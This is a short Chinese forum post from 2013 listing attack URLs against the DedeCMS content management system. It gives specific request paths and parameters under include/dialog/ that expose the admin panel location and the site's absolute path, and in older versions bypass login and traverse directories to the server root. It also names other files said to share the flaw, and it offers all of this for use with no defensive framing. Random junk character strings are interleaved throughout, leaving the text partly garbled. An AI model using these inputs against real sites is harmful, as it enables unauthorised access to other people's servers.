1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理8 L! j! \9 G+ y- c1 m5 k
8 [5 d' y* ?0 f9 c' c9 i9 \0 e员帐号,新版本的就直接转向了后台.# G5 P3 ~; {) R3 v
# Z. p0 c. {$ G6 h; D2.include/dialog/config.php会爆出后台管理路径/ `! A" [4 s5 c u# V7 o
* j' y2 m* w9 M4 z9 t" O Y! v
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录; \" ?/ V1 g8 N8 _
- F, H Z/ Y) ~& z+ t
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.6 W+ l3 c7 ~/ X: ]
; H% ?8 G$ C, c9 K. A& D
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
! c% i2 d* M; O, N+ n+ y8 a) \& \0 Z+ `- ?$ y
到根目录去.不过这些版本的访问地址有些不同.
" n) B+ `% h; s+ n' ?地址为require/dialog/select_soft.php?activepath=/././././././././" E1 g" B3 H& F0 A/ t( O
9 B" V5 r: u. c5 @include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..8 t7 ?- w! j* F- x6 M5 D
存在相同问题的文件还有4 Q4 q2 f* J9 h: h( u* f
include\dialog\select_images.php2 X/ M, P7 L# T; u4 K9 e* j
include\dialog\select_media.php0 ]8 \( X4 _9 N5 l P8 n
include\dialog\select_templets.php4 ` Q C: ?8 J& B
|
发表于 2013-4-16 16:50:43
收藏
支持
反对